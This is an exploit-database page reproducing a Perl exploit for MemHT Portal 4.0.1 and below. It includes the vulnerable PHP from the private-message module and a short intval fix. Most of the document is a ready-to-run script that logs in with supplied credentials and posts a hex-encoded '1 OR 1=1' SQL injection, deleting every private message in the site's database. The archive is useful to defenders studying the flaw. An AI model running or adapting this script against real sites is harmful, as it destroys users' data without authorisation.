Vulners
Lucene search
MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit
==================================================================
MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit
==================================================================
#!/usr/bin/perl
# MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit
<<Details;
Note:
1- works regardless of php.ini settings.
2- blind sql injection benchmark() method is possible.
3- don't add me on msn messenger.
4- Thanks to evilsocket && Sir Dark.
5- MemHT is a good content management system but it has some security problem.
/pages/pvtmsg/index.php / Line: 851 -867
<?php
}
break;
case "deleteSelected":
if (isset($_POST['deletenewpm'])) {
foreach ($_POST['deletenewpm'] as $value) {
$dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
}
}
if (isset($_POST['deletepm'])) {
foreach ($_POST['deletepm'] as $value) {
$dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
}
}
?>
ok then foreach ($_POST['deletenewpm'] as $value)
deletenewpm[]= $value ;) so if we send a evil code like this:
1 OR 1=1 we'll delete all messages from mysql database
Possible Fix:
Line: 859 && 864
Edit $dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
Fix: $dblink->query("DELETE FROM memht_pvtmsg WHERE id=".intval($value));
regards :)
Details
use IO::Socket;
use Digest::MD5('md5_hex');
our ($host,$path,$id,$username,$password) = @ARGV;
if (@ARGV != 5) {
print "\n+--------------------------------------------------------------------+\r",
"\n| MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit |\r",
"\n+--------------------------------------------------------------------+\r",
"\nby yeat - staker[at]hotmail[dot]it\n",
"\nUsage + perl $0 [host] [path] [id] [username] [password]\r",
"\nHost + localhost\r",
"\nPath + /MemHT\r",
"\nID + your user id\r",
"\nPassword + your password\n";
exit;
}
else {
my $html = undef;
my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
) or die $!;
my $post = "deletenewpm[]=\x31\x20\x4F\x52\x20\x31\x3D\x31".
"&Submit.x=34".
"&Submit.y=9";
my $auth = cookies();
my $data = "POST /$path/index.php?page=pvtmsg&op=deleteSelected HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Lynx (textmode)\r\n".
"Cookie: $auth\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".length($post)."\r\n\r\n$post\r\n\r\n".
"Connection: close\r\n\r\n";
$sock->send($data);
while (<$sock>) {
$html .= $_;
}
if ($html =~ /Private Messages/i) {
print "Exploit successfull,all messages deleted.\n";
}
else {
print "Exploit failed!\n";
}
}
sub cookies
{
$username = md5_hex($username);
$password = md5_hex($password);
return "login_user=$id#$username#$password";
}
# 0day.today [2018-02-16] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Feb 2009 00:00Current
7.1High risk
Vulners AI Score7.1